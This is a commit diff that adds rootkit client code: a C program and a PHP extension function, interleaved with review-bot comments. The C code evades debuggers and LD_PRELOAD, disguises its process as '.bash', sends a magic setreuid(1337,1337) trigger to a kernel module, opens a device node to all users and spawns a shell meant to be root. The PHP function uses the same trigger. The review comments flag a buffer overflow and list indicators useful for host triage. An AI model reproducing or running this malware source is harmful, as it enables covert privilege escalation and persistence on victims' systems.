
master
Root 5 years ago
parent
commit
f526553ad5
  1. 95
      rkbin/src/main.c
  2. 5
      rkphp/src/php_funcs.c

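--- a/rkbin/src/main.c
+++ b/rkbin/src/main.c
@@ -0,0 +1,95 @@
+#define _GNU_SOURCE
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/ptrace.h>
+#include "config.h"
+#define SPC_DEBUGGER_PRESENT (num_traps == 0)
+/**TRAP-DETECT-FUNCTIONS********************/
+static int num_traps = 0;
+static void dbg_trap(int signo)
+{
+num_traps++;
+}
+int spc_trap_detect(void)
+{
+if(signal(SIGTRAP, dbg_trap) == SIG_ERR)
+return 0;
+raise(SIGTRAP);
+return 1;
+}
+/**TRAP-DETECT-FUNCTIONS********************/
+int main(int argc, char *argv[])
+{
+int i;
+char orig_argv0[512];
+/** DETECT DEBUG/TRAPS **/
+spc_trap_detect();
+for(i = 0; i < 10; i++)
+if(SPC_DEBUGGER_PRESENT)
+return 0;
+if(getenv("LD_PRELOAD"))
+return 0;
+if(ptrace(PTRACE_TRACEME, 0, 0, 0) < 0)
+return 0;
+/** DETECT DEBUG/TRAPS **/
+setsid();
+chdir("/");
+//signal(SIGPIPE, SIG_IGN);
+printf(
+" \n"
+" |----------------------------------\\ \n"
+" | RRRR 000 k t |x\\ \n"
+" | R R 0 00 k k ii t |xx\\\n"
+" | RRRR 0 0 0 *** rrr kk ttt |xx|\n"
+" | R R 00 0 r k k ii t |xx|\n"
+" | R RR 000 r k k ii tt |xx|\n"
+" \\---------------------------------|xx|\n"
+" \\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx|\n"
+" \\-----------------------------------\n\n"
+);
+/** REWRITE PROC NAME **/
+strncpy(orig_argv0, argv[0], strlen(argv[0]));
+if(strlen(orig_argv0) > 0)
+{
+int i;
+char *newargv = ".bash";
+for(i = 0; argv[0][i] != 0; i++)
+argv[0][i] = 0;
+strncpy(argv[0], newargv, strlen(newargv));
+if(strstr(argv[0], orig_argv0) == NULL)
+printf("main: Rewrote Proc Name from %s to %s!\n", orig_argv0, argv[0]);
+else
+printf("main: Unable to rewrite Proc Name from %s to %s!\n", orig_argv0, newargv);
+}
+/** REWRITE PROC NAME **/
+// With this I give you root!
+setreuid(1337, 1337);
+// Lets hope it's working, so /dev/DEVICE_NAME == chmod 0666
+chmod("/dev/" DEVICE_NAME, 0666);
+// Spawn hopefully our root shell!
+system("/bin/bash");
+return 0;
+}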
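Review bot: The `strncpy(orig_argv0, argv[0], strlen(argv[0]));` call in the REWRITE PROC NAME block is bounded by the source length rather than the 512-byte destination and never writes a terminator, so a long `argv[0]` overruns the stack buffer and the following `strlen(orig_argv0)` reads indeterminate bytes; `snprintf(orig_argv0, sizeof orig_argv0, "%s", argv[0]);` would bound and terminate the copy. The return values of `setreuid`, `chmod` and `system` are all discarded, so nothing in the program's output shows whether any of those steps took effect. For anyone triaging a host, the behaviours fixed in this file are the observable ones: a process whose `argv[0]` reads `.bash`, a `setreuid` call with the 1337/1337 pair, the node `/dev/` plus `DEVICE_NAME` (defined in `config.h`, not shown here) set to mode 0666, and a `/bin/bash` child. The file has no header comment; one line such as `/* exits when traced or LD_PRELOAD is set, renames argv[0], requests uid 1337, chmods the device node to 0666, spawns a shell */` would make that readable at a glance.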

5
rkphp/src/php_funcs.c

@ -1,4 +1,5 @@ @@ -1,4 +1,5 @@
#include <stdio.h>
#include <unistd.h>
#include "common.h"
@ -42,11 +43,11 @@ PHP_FUNCTION(rkphp_ex) @@ -42,11 +43,11 @@ PHP_FUNCTION(rkphp_ex)
RKPHP_PRINTF("[!] CODE: %lx matched %lx\n", lstart + lend, code);
setreuid(1337, 1337);
/* This is where we'll attempt to interact with the kernel rkmod */
RKPHP_PRINTF("[*] Gained Root privileges successfully.\n");
RETURN_NULL();
RETURN_TRUE;
}
/* }}} */
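Review bot: The `[*] Gained Root privileges successfully.` message follows `setreuid(1337, 1337);` unconditionally and the call's return value is discarded, so the log line is printed whether or not the credentials changed. The same 1337/1337 pair appears in `rkbin/src/main.c`, and going by the comment on the next line it is presumably the value the kernel module acts on, which makes that argument pair the thing to key an audit rule or syscall trace on. A comment such as `/* 1337/1337 is the request value shared with rkbin; result unchecked, message below is not proof of success */` would record that. `RETURN_NULL();` and `RETURN_TRUE;` appear back to back because the page lost its `+`/`-` markers, so which one is the new return cannot be told from here, and the body of `PHP_FUNCTION(rkphp_ex)` starts above the hunk.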
